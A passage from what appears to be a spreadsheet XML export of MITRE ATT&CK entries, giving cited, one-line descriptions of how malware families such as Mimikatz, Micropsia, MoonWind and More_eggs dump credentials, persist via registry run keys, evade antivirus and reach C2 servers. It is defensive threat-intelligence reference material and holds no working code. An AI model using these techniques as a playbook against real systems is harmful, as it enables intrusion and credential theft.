    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) requires the user to double-click the executable to run the malicious HTA file.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has obfuscated and encrypted some payloads.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to a Registry Run key and used .LNK files in the startup folder to achieve persistence.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim’s machine.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim’s system.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has searched the system for an extensive list of Brazilian banking software.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails containing malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has collected the hostname and Operating System version from the system.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims’ systems.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for downloading items.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute files.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a RAR archive based on collected files on the victim's machine.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform microphone recording.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can download and execute an executable from the C2 server.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) has keylogging capabilities.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) obfuscates the configuration with a custom Base64 and XOR.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a shortcut to maintain persistence.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim’s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) collects the username from the victim’s machine.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a command-line shell using cmd.exe.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) can dump process memory and extract clear-text credentials.(Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The &lt;code&gt;LSADUMP::ChangeNTLM&lt;/code&gt; and &lt;code&gt;LSADUMP::SetNTLM&lt;/code&gt; modules can also manipulate the password hash of an account without knowing the clear text value.(Citation: Adsecurity Mimikatz Guide)(Citation: Metcalf 2015)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create golden tickets.(Citation: GitHub Mimikatz kerberos Module)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;SEKURLSA::Pth&lt;/code&gt; module can impersonate a user, with only a password hash, to execute arbitrary commands.(Citation: Adsecurity Mimikatz Guide)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCSync&lt;/code&gt; and &lt;code&gt;KERBEROS::PTT&lt;/code&gt; modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)(Citation: Harmj0y DCSync Sept 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCShadow&lt;/code&gt; module can be used to make AD updates by temporarily setting a computer to be a DC.(Citation: Deply Mimikatz)(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;MISC::AddSid&lt;/code&gt; module can appended any SID or user/group account to a user's SID-History. [Mimikatz](https://attack.mitre.org/software/S0002) also utilizes [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper contains an implementation of an SSP.(Citation: Deply Mimikatz)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create silver tickets.(Citation: GitHub Mimikatz kerberos Module)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) contains functionality to acquire credentials from the Windows Credential Manager.(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.(Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can create a process on a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.(Citation: Securelist MiniDuke Feb 2013)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can enumerate local drives.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use control flow flattening to obscure code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can gather the hostname on a compromised machine.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is likely loaded via DLL hijacking into a legitimate McAfee binary.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has a function for decrypting data containing C2 configuration information.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can collect CPU and architecture information from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can gather the username from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has the capability to execute commands using cmd.exe.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a temporary user on the system named “Lost_{Unique Identifier}.”(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Mis-Type](https://attack.mitre.org/software/S0084) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over HTTP.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses cmd.exe to run commands for enumerating the host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting the backdoor file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting Registry keys used for persistence.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of downloading files from the C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic communicates over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic is Base64-encoded plaintext.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Misdat](https://attack.mitre.org/software/S0083) contains the operating system version of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>Many [Misdat](https://attack.mitre.org/software/S0083) samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of providing shell functionality to the attacker to execute commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to download and execute .exe files.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) creates the following Registry entry: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia&lt;/code&gt;.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to gather NTLM password information.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to open a remote shell and run basic commands.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim browser bookmarks.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data collected from the victim mobile device.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to download a file from the C2 server to the victim mobile device's SD card.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload information about all running processes to its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can download additional payloads from the C2.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can use PowerShell to set persistence.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can achieve persitence on the infected machine by setting the Registry run key.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can use WMI commands to check the system for firewall and antivirus software.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can collect information about the about the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can execute commands via the command line utility.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can perform WMI commands on the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can delete itself or specified files.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a directory listing for a specified directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a keylogger.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) saves information from its keylogging routine as a .zip file in the present working directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) completes network communication via raw sockets.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the number of removable drives from the victim.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a list of running processes.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) encrypts C2 traffic using RC4 with a static key.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim IP address.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim username.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim's current time.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can execute commands via an interactive command shell.(Citation: Palo Alto MoonWind March 2017) [MoonWind](https://attack.mitre.org/software/S0149) uses batch scripts for various purposes, including to restart and uninstall itself.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) will decode malware components that are then dropped to the system.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can remove itself from a system.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used HTTP GET requests to check internet connectivity.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284)'s payload has been encrypted with a key that has the hostname and processor family information appended to the end.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used regsvr32.exe to execute the malicious DLL.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can obtain information on installed anti-malware programs.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used basE91 encoding, along with encryption, for C2 communication.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used an RC4-based encryption method for its C2 communications.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the OS version and computer name.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the IP address from the victim's machine.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the username from the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used cmd.exe for execution.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses COM hijacking as a method of persistence.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) deletes files using DeleteFileW API call.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can upload and download files to the victim.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) stores configuration values under the Registry key &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt; and modifies Registry keys under &lt;code&gt;HKCR\CLSID\...\InprocServer32&lt;/code&gt;with a path to the launcher.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)’s installer is obfuscated with a custom crypter to obfuscate the installer.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can launch PowerShell Scripts.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;tasklist&lt;/code&gt; to obtain running processes.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) establishes persistence under the Registry key &lt;code&gt;HKCU\Software\Run auto_update&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
